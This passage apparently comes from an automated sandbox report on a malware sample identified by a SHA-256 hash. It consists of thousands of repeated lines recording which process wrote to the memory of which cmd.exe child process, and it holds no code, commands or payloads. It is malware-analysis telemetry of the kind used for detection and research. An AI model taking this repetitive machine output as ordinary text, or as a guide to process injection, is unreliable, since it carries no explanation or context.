memory of 548 320 cmd.exe 98 PID 320 wrote to memory of 548 320 cmd.exe 98 PID 320 wrote to memory of 548 320 cmd.exe 98 PID 320 wrote to memory of 1792 320 cmd.exe 99 PID 320 wrote to memory of 1792 320 cmd.exe 99 PID 320 wrote to memory of 1792 320 cmd.exe 99 PID 320 wrote to memory of 1792 320 cmd.exe 99 PID 320 wrote to memory of 1644 320 cmd.exe 100 PID 320 wrote to memory of 1644 320 cmd.exe 100 PID 320 wrote to memory of 1644 320 cmd.exe 100 PID 320 wrote to memory of 1644 320 cmd.exe 100 PID 1644 wrote to memory of 1032 1644 cmd.exe 101 PID 1644 wrote to memory of 1032 1644 cmd.exe 101 PID 1644 wrote to memory of 1032 1644 cmd.exe 101 PID 1644 wrote to memory of 1032 1644 cmd.exe 101 PID 320 wrote to memory of 676 320 cmd.exe 102 PID 320 wrote to memory of 676 320 cmd.exe 102 PID 320 wrote to memory of 676 320 cmd.exe 102 PID 320 wrote to memory of 676 320 cmd.exe 102 PID 672 wrote to memory of 992 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 103 PID 672 wrote to memory of 992 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 103 PID 672 wrote to memory of 992 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 103 PID 672 wrote to memory of 992 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 103 PID 992 wrote to memory of 1940 992 cmd.exe 105 PID 992 wrote to memory of 1940 992 cmd.exe 105 PID 992 wrote to memory of 1940 992 cmd.exe 105 PID 992 wrote to memory of 1940 992 cmd.exe 105 PID 992 wrote to memory of 1176 992 cmd.exe 106 PID 992 wrote to memory of 1176 992 cmd.exe 106 PID 992 wrote to memory of 1176 992 cmd.exe 106 PID 992 wrote to memory of 1176 992 cmd.exe 106 PID 992 wrote to memory of 436 992 cmd.exe 107 PID 992 wrote to memory of 436 992 cmd.exe 107 PID 992 wrote to memory of 436 992 cmd.exe 107 PID 992 wrote to memory of 436 992 cmd.exe 107 PID 436 wrote to memory of 1128 436 cmd.exe 108 PID 436 wrote to memory of 1128 436 cmd.exe 108 PID 436 wrote to memory of 1128 436 cmd.exe 108 PID 436 wrote to memory of 1128 436 cmd.exe 108 PID 992 wrote to memory of 1960 992 cmd.exe 109 PID 992 wrote to memory of 1960 992 cmd.exe 109 PID 992 wrote to memory of 1960 992 cmd.exe 109 PID 992 wrote to memory of 1960 992 cmd.exe 109 PID 672 wrote to memory of 1244 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 110 PID 672 wrote to memory of 1244 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 110 PID 672 wrote to memory of 1244 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 110 PID 672 wrote to memory of 1244 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 110 PID 1244 wrote to memory of 1840 1244 cmd.exe 112 PID 1244 wrote to memory of 1840 1244 cmd.exe 112 PID 1244 wrote to memory of 1840 1244 cmd.exe 112 PID 1244 wrote to memory of 1840 1244 cmd.exe 112 PID 1244 wrote to memory of 700 1244 cmd.exe 113 PID 1244 wrote to memory of 700 1244 cmd.exe 113 PID 1244 wrote to memory of 700 1244 cmd.exe 113 PID 1244 wrote to memory of 700 1244 cmd.exe 113 PID 1244 wrote to memory of 1848 1244 cmd.exe 114 PID 1244 wrote to memory of 1848 1244 cmd.exe 114 PID 1244 wrote to memory of 1848 1244 cmd.exe 114 PID 1244 wrote to memory of 1848 1244 cmd.exe 114 PID 1848 wrote to memory of 360 1848 cmd.exe 115 PID 1848 wrote to memory of 360 1848 cmd.exe 115 PID 1848 wrote to memory of 360 1848 cmd.exe 115 PID 1848 wrote to memory of 360 1848 cmd.exe 115 PID 1244 wrote to memory of 1736 1244 cmd.exe 116 PID 1244 wrote to memory of 1736 1244 cmd.exe 116 PID 1244 wrote to memory of 1736 1244 cmd.exe 116 PID 1244 wrote to memory of 1736 1244 cmd.exe 116 PID 672 wrote to memory of 1896 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 117 PID 672 wrote to memory of 1896 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 117 PID 672 wrote to memory of 1896 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 117 PID 672 wrote to memory of 1896 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 117 PID 1896 wrote to memory of 1068 1896 cmd.exe 119 PID 1896 wrote to memory of 1068 1896 cmd.exe 119 PID 1896 wrote to memory of 1068 1896 cmd.exe 119 PID 1896 wrote to memory of 1068 1896 cmd.exe 119 PID 1896 wrote to memory of 1216 1896 cmd.exe 120 PID 1896 wrote to memory of 1216 1896 cmd.exe 120 PID 1896 wrote to memory of 1216 1896 cmd.exe 120 PID 1896 wrote to memory of 1216 1896 cmd.exe 120 PID 1896 wrote to memory of 1644 1896 cmd.exe 121 PID 1896 wrote to memory of 1644 1896 cmd.exe 121 PID 1896 wrote to memory of 1644 1896 cmd.exe 121 PID 1896 wrote to memory of 1644 1896 cmd.exe 121 PID 1644 wrote to memory of 524 1644 cmd.exe 122 PID 1644 wrote to memory of 524 1644 cmd.exe 122 PID 1644 wrote to memory of 524 1644 cmd.exe 122 PID 1644 wrote to memory of 524 1644 cmd.exe 122 PID 1896 wrote to memory of 700 1896 cmd.exe 123 PID 1896 wrote to memory of 700 1896 cmd.exe 123 PID 1896 wrote to memory of 700 1896 cmd.exe 123 PID 1896 wrote to memory of 700 1896 cmd.exe 123 PID 672 wrote to memory of 1756 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 124 PID 672 wrote to memory of 1756 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 124 PID 672 wrote to memory of 1756 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 124 PID 672 wrote to memory of 1756 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 124 PID 1756 wrote to memory of 1736 1756 cmd.exe 126 PID 1756 wrote to memory of 1736 1756 cmd.exe 126 PID 1756 wrote to memory of 1736 1756 cmd.exe 126 PID 1756 wrote to memory of 1736 1756 cmd.exe 126 PID 1756 wrote to memory of 1220 1756 cmd.exe 127 PID 1756 wrote to memory of 1220 1756 cmd.exe 127 PID 1756 wrote to memory of 1220 1756 cmd.exe 127 PID 1756 wrote to memory of 1220 1756 cmd.exe 127 PID 1756 wrote to memory of 980 1756 cmd.exe 128 PID 1756 wrote to memory of 980 1756 cmd.exe 128 PID 1756 wrote to memory of 980 1756 cmd.exe 128 PID 1756 wrote to memory of 980 1756 cmd.exe 128 PID 980 wrote to memory of 992 980 cmd.exe 129 PID 980 wrote to memory of 992 980 cmd.exe 129 PID 980 wrote to memory of 992 980 cmd.exe 129 PID 980 wrote to memory of 992 980 cmd.exe 129 PID 1756 wrote to memory of 1372 1756 cmd.exe 130 PID 1756 wrote to memory of 1372 1756 cmd.exe 130 PID 1756 wrote to memory of 1372 1756 cmd.exe 130 PID 1756 wrote to memory of 1372 1756 cmd.exe 130 PID 672 wrote to memory of 1636 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 131 PID 672 wrote to memory of 1636 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 131 PID 672 wrote to memory of 1636 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 131 PID 672 wrote to memory of 1636 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 131 PID 1636 wrote to memory of 2044 1636 cmd.exe 133 PID 1636 wrote to memory of 2044 1636 cmd.exe 133 PID 1636 wrote to memory of 2044 1636 cmd.exe 133 PID 1636 wrote to memory of 2044 1636 cmd.exe 133 PID 1636 wrote to memory of 1960 1636 cmd.exe 134 PID 1636 wrote to memory of 1960 1636 cmd.exe 134 PID 1636 wrote to memory of 1960 1636 cmd.exe 134 PID 1636 wrote to memory of 1960 1636 cmd.exe 134 PID 1636 wrote to memory of 1792 1636 cmd.exe 135 PID 1636 wrote to memory of 1792 1636 cmd.exe 135 PID 1636 wrote to memory of 1792 1636 cmd.exe 135 PID 1636 wrote to memory of 1792 1636 cmd.exe 135 PID 1792 wrote to memory of 1848 1792 cmd.exe 136 PID 1792 wrote to memory of 1848 1792 cmd.exe 136 PID 1792 wrote to memory of 1848 1792 cmd.exe 136 PID 1792 wrote to memory of 1848 1792 cmd.exe 136 PID 1680 wrote to memory of 212 1680 cmd.exe 137 PID 1680 wrote to memory of 212 1680 cmd.exe 137 PID 1680 wrote to memory of 212 1680 cmd.exe 137 PID 1636 wrote to memory of 224 1636 cmd.exe 138 PID 1636 wrote to memory of 224 1636 cmd.exe 138 PID 1636 wrote to memory of 224 1636 cmd.exe 138 PID 1636 wrote to memory of 224 1636 cmd.exe 138 PID 672 wrote to memory of 472 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 139 PID 672 wrote to memory of 472 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 139 PID 672 wrote to memory of 472 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 139 PID 672 wrote to memory of 472 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 139 PID 472 wrote to memory of 1220 472 cmd.exe 141 PID 472 wrote to memory of 1220 472 cmd.exe 141 PID 472 wrote to memory of 1220 472 cmd.exe 141 PID 472 wrote to memory of 1220 472 cmd.exe 141 PID 472 wrote to memory of 1032 472 cmd.exe 142 PID 472 wrote to memory of 1032 472 cmd.exe 142 PID 472 wrote to memory of 1032 472 cmd.exe 142 PID 472 wrote to memory of 1032 472 cmd.exe 142 PID 472 wrote to memory of 992 472 cmd.exe 143 PID 472 wrote to memory of 992 472 cmd.exe 143 PID 472 wrote to memory of 992 472 cmd.exe 143 PID 472 wrote to memory of 992 472 cmd.exe 143 PID 992 wrote to memory of 1384 992 cmd.exe 144 PID 992 wrote to memory of 1384 992 cmd.exe 144 PID 992 wrote to memory of 1384 992 cmd.exe 144 PID 992 wrote to memory of 1384 992 cmd.exe 144 PID 472 wrote to memory of 1756 472 cmd.exe 145 PID 472 wrote to memory of 1756 472 cmd.exe 145 PID 472 wrote to memory of 1756 472 cmd.exe 145 PID 472 wrote to memory of 1756 472 cmd.exe 145 PID 672 wrote to memory of 1052 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 146 PID 672 wrote to memory of 1052 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 146 PID 672 wrote to memory of 1052 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 146 PID 672 wrote to memory of 1052 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 146 PID 1052 wrote to memory of 1940 1052 cmd.exe 148 PID 1052 wrote to memory of 1940 1052 cmd.exe 148 PID 1052 wrote to memory of 1940 1052 cmd.exe 148 PID 1052 wrote to memory of 1940 1052 cmd.exe 148 PID 1052 wrote to memory of 1080 1052 cmd.exe 149 PID 1052 wrote to memory of 1080 1052 cmd.exe 149 PID 1052 wrote to memory of 1080 1052 cmd.exe 149 PID 1052 wrote to memory of 1080 1052 cmd.exe 149 PID 1052 wrote to memory of 1828 1052 cmd.exe 150 PID 1052 wrote to memory of 1828 1052 cmd.exe 150 PID 1052 wrote to memory of 1828 1052 cmd.exe 150 PID 1052 wrote to memory of 1828 1052 cmd.exe 150 PID 1828 wrote to memory of 1848 1828 cmd.exe 151 PID 1828 wrote to memory of 1848 1828 cmd.exe 151 PID 1828 wrote to memory of 1848 1828 cmd.exe 151 PID 1828 wrote to memory of 1848 1828 cmd.exe 151 PID 1052 wrote to memory of 652 1052 cmd.exe 152 PID 1052 wrote to memory of 652 1052 cmd.exe 152 PID 1052 wrote to memory of 652 1052 cmd.exe 152 PID 1052 wrote to memory of 652 1052 cmd.exe 152 PID 672 wrote to memory of 1636 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 153 PID 672 wrote to memory of 1636 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 153 PID 672 wrote to memory of 1636 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 153 PID 672 wrote to memory of 1636 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 153 PID 1636 wrote to memory of 364 1636 cmd.exe 155 PID 1636 wrote to memory of 364 1636 cmd.exe 155 PID 1636 wrote to memory of 364 1636 cmd.exe 155 PID 1636 wrote to memory of 364 1636 cmd.exe 155 PID 1636 wrote to memory of 1032 1636 cmd.exe 156 PID 1636 wrote to memory of 1032 1636 cmd.exe 156 PID 1636 wrote to memory of 1032 1636 cmd.exe 156 PID 1636 wrote to memory of 1032 1636 cmd.exe 156 PID 1636 wrote to memory of 548 1636 cmd.exe 157 PID 1636 wrote to memory of 548 1636 cmd.exe 157 PID 1636 wrote to memory of 548 1636 cmd.exe 157 PID 1636 wrote to memory of 548 1636 cmd.exe 157 PID 548 wrote to memory of 1384 548 cmd.exe 158 PID 548 wrote to memory of 1384 548 cmd.exe 158 PID 548 wrote to memory of 1384 548 cmd.exe 158 PID 548 wrote to memory of 1384 548 cmd.exe 158 PID 1636 wrote to memory of 1176 1636 cmd.exe 159 PID 1636 wrote to memory of 1176 1636 cmd.exe 159 PID 1636 wrote to memory of 1176 1636 cmd.exe 159 PID 1636 wrote to memory of 1176 1636 cmd.exe 159 PID 672 wrote to memory of 1896 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 160 PID 672 wrote to memory of 1896 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 160 PID 672 wrote to memory of 1896 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 160 PID 672 wrote to memory of 1896 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 160 PID 1896 wrote to memory of 1080 1896 cmd.exe 162 PID 1896 wrote to memory of 1080 1896 cmd.exe 162 PID 1896 wrote to memory of 1080 1896 cmd.exe 162 PID 1896 wrote to memory of 1080 1896 cmd.exe 162 PID 1896 wrote to memory of 236 1896 cmd.exe 163 PID 1896 wrote to memory of 236 1896 cmd.exe 163 PID 1896 wrote to memory of 236 1896 cmd.exe 163 PID 1896 wrote to memory of 236 1896 cmd.exe 163 PID 1896 wrote to memory of 1848 1896 cmd.exe 164 PID 1896 wrote to memory of 1848 1896 cmd.exe 164 PID 1896 wrote to memory of 1848 1896 cmd.exe 164 PID 1896 wrote to memory of 1848 1896 cmd.exe 164 PID 1848 wrote to memory of 224 1848 cmd.exe 165 PID 1848 wrote to memory of 224 1848 cmd.exe 165 PID 1848 wrote to memory of 224 1848 cmd.exe 165 PID 1848 wrote to memory of 224 1848 cmd.exe 165 PID 1896 wrote to memory of 700 1896 cmd.exe 166 PID 1896 wrote to memory of 700 1896 cmd.exe 166 PID 1896 wrote to memory of 700 1896 cmd.exe 166 PID 1896 wrote to memory of 700 1896 cmd.exe 166 PID 672 wrote to memory of 1468 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 167 PID 672 wrote to memory of 1468 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 167 PID 672 wrote to memory of 1468 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 167 PID 672 wrote to memory of 1468 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 167 PID 1468 wrote to memory of 992 1468 cmd.exe 169 PID 1468 wrote to memory of 992 1468 cmd.exe 169 PID 1468 wrote to memory of 992 1468 cmd.exe 169 PID 1468 wrote to memory of 992 1468 cmd.exe 169 PID 1468 wrote to memory of 980 1468 cmd.exe 170 PID 1468 wrote to memory of 980 1468 cmd.exe 170 PID 1468 wrote to memory of 980 1468 cmd.exe 170 PID 1468 wrote to memory of 980 1468 cmd.exe 170 PID 1468 wrote to memory of 1068 1468 cmd.exe 172 PID 1468 wrote to memory of 1068 1468 cmd.exe 172 PID 1468 wrote to memory of 1068 1468 cmd.exe 172 PID 1468 wrote to memory of 1068 1468 cmd.exe 172 PID 1068 wrote to memory of 232 1068 cmd.exe 173 PID 1068 wrote to memory of 232 1068 cmd.exe 173 PID 1068 wrote to memory of 232 1068 cmd.exe 173 PID 1068 wrote to memory of 232 1068 cmd.exe 173 PID 1468 wrote to memory of 236 1468 cmd.exe 174 PID 1468 wrote to memory of 236 1468 cmd.exe 174 PID 1468 wrote to memory of 236 1468 cmd.exe 174 PID 1468 wrote to memory of 236 1468 cmd.exe 174 PID 672 wrote to memory of 1840 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 175 PID 672 wrote to memory of 1840 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 175 PID 672 wrote to memory of 1840 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 175 PID 672 wrote to memory of 1840 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 175 PID 1840 wrote to memory of 1948 1840 cmd.exe 177 PID 1840 wrote to memory of 1948 1840 cmd.exe 177 PID 1840 wrote to memory of 1948 1840 cmd.exe 177 PID 1840 wrote to memory of 1948 1840 cmd.exe 177 PID 1840 wrote to memory of 756 1840 cmd.exe 178 PID 1840 wrote to memory of 756 1840 cmd.exe 178 PID 1840 wrote to memory of 756 1840 cmd.exe 178 PID 1840 wrote to memory of 756 1840 cmd.exe 178 PID 1840 wrote to memory of 1128 1840 cmd.exe 179 PID 1840 wrote to memory of 1128 1840 cmd.exe 179 PID 1840 wrote to memory of 1128 1840 cmd.exe 179 PID 1840 wrote to memory of 1128 1840 cmd.exe 179 PID 1128 wrote to memory of 700 1128 cmd.exe 180 PID 1128 wrote to memory of 700 1128 cmd.exe 180 PID 1128 wrote to memory of 700 1128 cmd.exe 180 PID 1128 wrote to memory of 700 1128 cmd.exe 180 PID 1680 wrote to memory of 1220 1680 cmd.exe 181 PID 1680 wrote to memory of 1220 1680 cmd.exe 181 PID 1680 wrote to memory of 1220 1680 cmd.exe 181 PID 1840 wrote to memory of 864 1840 cmd.exe 182 PID 1840 wrote to memory of 864 1840 cmd.exe 182 PID 1840 wrote to memory of 864 1840 cmd.exe 182 PID 1840 wrote to memory of 864 1840 cmd.exe 182 PID 672 wrote to memory of 980 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 183 PID 672 wrote to memory of 980 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 183 PID 672 wrote to memory of 980 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 183 PID 672 wrote to memory of 980 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 183 PID 980 wrote to memory of 1068 980 cmd.exe 185 PID 980 wrote to memory of 1068 980 cmd.exe 185 PID 980 wrote to memory of 1068 980 cmd.exe 185 PID 980 wrote to memory of 1068 980 cmd.exe 185 PID 980 wrote to memory of 1960 980 cmd.exe 186 PID 980 wrote to memory of 1960 980 cmd.exe 186 PID 980 wrote to memory of 1960 980 cmd.exe 186 PID 980 wrote to memory of 1960 980 cmd.exe 186 PID 980 wrote to memory of 320 980 cmd.exe 187 PID 980 wrote to memory of 320 980 cmd.exe 187 PID 980 wrote to memory of 320 980 cmd.exe 187 PID 980 wrote to memory of 320 980 cmd.exe 187 PID 320 wrote to memory of 1032 320 cmd.exe 188 PID 320 wrote to memory of 1032 320 cmd.exe 188 PID 320 wrote to memory of 1032 320 cmd.exe 188 PID 320 wrote to memory of 1032 320 cmd.exe 188 PID 980 wrote to memory of 760 980 cmd.exe 189 PID 980 wrote to memory of 760 980 cmd.exe 189 PID 980 wrote to memory of 760 980 cmd.exe 189 PID 980 wrote to memory of 760 980 cmd.exe 189 PID 672 wrote to memory of 756 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 190 PID 672 wrote to memory of 756 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 190 PID 672 wrote to memory of 756 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 190 PID 672 wrote to memory of 756 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 190 PID 756 wrote to memory of 896 756 cmd.exe 192 PID 756 wrote to memory of 896 756 cmd.exe 192 PID 756 wrote to memory of 896 756 cmd.exe 192 PID 756 wrote to memory of 896 756 cmd.exe 192 PID 756 wrote to memory of 216 756 cmd.exe 193 PID 756 wrote to memory of 216 756 cmd.exe 193 PID 756 wrote to memory of 216 756 cmd.exe 193 PID 756 wrote to memory of 216 756 cmd.exe 193 PID 756 wrote to memory of 700 756 cmd.exe 194 PID 756 wrote to memory of 700 756 cmd.exe 194 PID 756 wrote to memory of 700 756 cmd.exe 194 PID 756 wrote to memory of 700 756 cmd.exe 194 PID 700 wrote to memory of 524 700 cmd.exe 195 PID 700 wrote to memory of 524 700 cmd.exe 195 PID 700 wrote to memory of 524 700 cmd.exe 195 PID 700 wrote to memory of 524 700 cmd.exe 195 PID 756 wrote to memory of 1552 756 cmd.exe 196 PID 756 wrote to memory of 1552 756 cmd.exe 196 PID 756 wrote to memory of 1552 756 cmd.exe 196 PID 756 wrote to memory of 1552 756 cmd.exe 196 PID 672 wrote to memory of 220 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 197 PID 672 wrote to memory of 220 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 197 PID 672 wrote to memory of 220 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 197 PID 672 wrote to memory of 220 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 197 PID 220 wrote to memory of 1960 220 cmd.exe 199 PID 220 wrote to memory of 1960 220 cmd.exe 199 PID 220 wrote to memory of 1960 220 cmd.exe 199 PID 220 wrote to memory of 1960 220 cmd.exe 199 PID 220 wrote to memory of 364 220 cmd.exe 200 PID 220 wrote to memory of 364 220 cmd.exe 200 PID 220 wrote to memory of 364 220 cmd.exe 200 PID 220 wrote to memory of 364 220 cmd.exe 200 PID 220 wrote to memory of 1032 220 cmd.exe 201 PID 220 wrote to memory of 1032 220 cmd.exe 201 PID 220 wrote to memory of 1032 220 cmd.exe 201 PID 220 wrote to memory of 1032 220 cmd.exe 201 PID 1032 wrote to memory of 1948 1032 cmd.exe 202 PID 1032 wrote to memory of 1948 1032 cmd.exe 202 PID 1032 wrote to memory of 1948 1032 cmd.exe 202 PID 1032 wrote to memory of 1948 1032 cmd.exe 202 PID 220 wrote to memory of 232 220 cmd.exe 203 PID 220 wrote to memory of 232 220 cmd.exe 203 PID 220 wrote to memory of 232 220 cmd.exe 203 PID 220 wrote to memory of 232 220 cmd.exe 203 PID 672 wrote to memory of 1820 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 204 PID 672 wrote to memory of 1820 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 204 PID 672 wrote to memory of 1820 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 204 PID 672 wrote to memory of 1820 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 204 PID 1680 wrote to memory of 1368 1680 cmd.exe 206 PID 1680 wrote to memory of 1368 1680 cmd.exe 206 PID 1680 wrote to memory of 1368 1680 cmd.exe 206 PID 1820 wrote to memory of 2044 1820 cmd.exe 207 PID 1820 wrote to memory of 2044 1820 cmd.exe 207 PID 1820 wrote to memory of 2044 1820 cmd.exe 207 PID 1820 wrote to memory of 2044 1820 cmd.exe 207 PID 1680 wrote to memory of 864 1680 cmd.exe 208 PID 1680 wrote to memory of 864 1680 cmd.exe 208 PID 1680 wrote to memory of 864 1680 cmd.exe 208 PID 1820 wrote to memory of 992 1820 cmd.exe 209 PID 1820 wrote to memory of 992 1820 cmd.exe 209 PID 1820 wrote to memory of 992 1820 cmd.exe 209 PID 1820 wrote to memory of 992 1820 cmd.exe 209 PID 1820 wrote to memory of 1840 1820 cmd.exe 210 PID 1820 wrote to memory of 1840 1820 cmd.exe 210 PID 1820 wrote to memory of 1840 1820 cmd.exe 210 PID 1820 wrote to memory of 1840 1820 cmd.exe 210 PID 1840 wrote to memory of 1052 1840 cmd.exe 211 PID 1840 wrote to memory of 1052 1840 cmd.exe 211 PID 1840 wrote to memory of 1052 1840 cmd.exe 211 PID 1840 wrote to memory of 1052 1840 cmd.exe 211 PID 1820 wrote to memory of 652 1820 cmd.exe 212 PID 1820 wrote to memory of 652 1820 cmd.exe 212 PID 1820 wrote to memory of 652 1820 cmd.exe 212 PID 1820 wrote to memory of 652 1820 cmd.exe 212 PID 672 wrote to memory of 1960 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 213 PID 672 wrote to memory of 1960 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 213 PID 672 wrote to memory of 1960 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 213 PID 672 wrote to memory of 1960 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 213 PID 1960 wrote to memory of 676 1960 cmd.exe 215 PID 1960 wrote to memory of 676 1960 cmd.exe 215 PID 1960 wrote to memory of 676 1960 cmd.exe 215 PID 1960 wrote to memory of 676 1960 cmd.exe 215 PID 1960 wrote to memory of 760 1960 cmd.exe 216 PID 1960 wrote to memory of 760 1960 cmd.exe 216 PID 1960 wrote to memory of 760 1960 cmd.exe 216 PID 1960 wrote to memory of 760 1960 cmd.exe 216 PID 1960 wrote to memory of 1372 1960 cmd.exe 217 PID 1960 wrote to memory of 1372 1960 cmd.exe 217 PID 1960 wrote to memory of 1372 1960 cmd.exe 217 PID 1960 wrote to memory of 1372 1960 cmd.exe 217 PID 1372 wrote to memory of 1220 1372 cmd.exe 218 PID 1372 wrote to memory of 1220 1372 cmd.exe 218 PID 1372 wrote to memory of 1220 1372 cmd.exe 218 PID 1372 wrote to memory of 1220 1372 cmd.exe 218 PID 1960 wrote to memory of 228 1960 cmd.exe 219 PID 1960 wrote to memory of 228 1960 cmd.exe 219 PID 1960 wrote to memory of 228 1960 cmd.exe 219 PID 1960 wrote to memory of 228 1960 cmd.exe 219 PID 672 wrote to memory of 1368 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 220 PID 672 wrote to memory of 1368 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 220 PID 672 wrote to memory of 1368 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 220 PID 672 wrote to memory of 1368 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 220 PID 1368 wrote to memory of 1384 1368 cmd.exe 222 PID 1368 wrote to memory of 1384 1368 cmd.exe 222 PID 1368 wrote to memory of 1384 1368 cmd.exe 222 PID 1368 wrote to memory of 1384 1368 cmd.exe 222 PID 1368 wrote to memory of 1896 1368 cmd.exe 223 PID 1368 wrote to memory of 1896 1368 cmd.exe 223 PID 1368 wrote to memory of 1896 1368 cmd.exe 223 PID 1368 wrote to memory of 1896 1368 cmd.exe 223 PID 1368 wrote to memory of 1052 1368 cmd.exe 224 PID 1368 wrote to memory of 1052 1368 cmd.exe 224 PID 1368 wrote to memory of 1052 1368 cmd.exe 224 PID 1368 wrote to memory of 1052 1368 cmd.exe 224 PID 1052 wrote to memory of 224 1052 cmd.exe 225 PID 1052 wrote to memory of 224 1052 cmd.exe 225 PID 1052 wrote to memory of 224 1052 cmd.exe 225 PID 1052 wrote to memory of 224 1052 cmd.exe 225 PID 1368 wrote to memory of 360 1368 cmd.exe 226 PID 1368 wrote to memory of 360 1368 cmd.exe 226 PID 1368 wrote to memory of 360 1368 cmd.exe 226 PID 1368 wrote to memory of 360 1368 cmd.exe 226 PID 672 wrote to memory of 1512 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 227 PID 672 wrote to memory of 1512 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 227 PID 672 wrote to memory of 1512 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 227 PID 672 wrote to memory of 1512 672 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe 227 PID 1512 wrote to memory of 980 1512 cmd.exe 229 PID 1512 wrote to memory of 980 1512 cmd.exe 229 PID 1512 wrote to memory of 980 1512 cmd.exe 229 PID 1512 wrote to memory of 980 1512 cmd.exe 229 PID 1512 wrote to memory of 220 1512 cmd.exe 230 PID 1512 wrote to memory of 220 1512 cmd.exe 230 PID 1512 wrote to memory of 220 1512 cmd.exe 230 PID 1512 wrote to memory of 220 1512 cmd.exe 230 PID 1512 wrote to memory of 1936 1512 cmd.exe 231 PID 1512 wrote to memory of 1936 1512 cmd.exe 231 PID 1512 wrote to memory of 1936 1512 cmd.exe 231 PID 1512 wrote to memory of 1936 1512 cmd.exe 231 PID 1936 wrote to memory of 1216 1936 cmd.exe 232 PID 1936 wrote to memory of 1216 1936 cmd.exe 232 PID 1936 wrote to memory of 1216 1936 cmd.exe 232 PID 1936 wrote to memory of 1216 1936 cmd.exe 232 PID 1512 wrote to memory of 320 1512 cmd.exe 233 PID 1512 wrote to memory of 320 1512 cmd.exe 233 PID 1512 wrote to memory of 320 1512 cmd.exe 233 PID 1512 wrote to memory of 320 1512 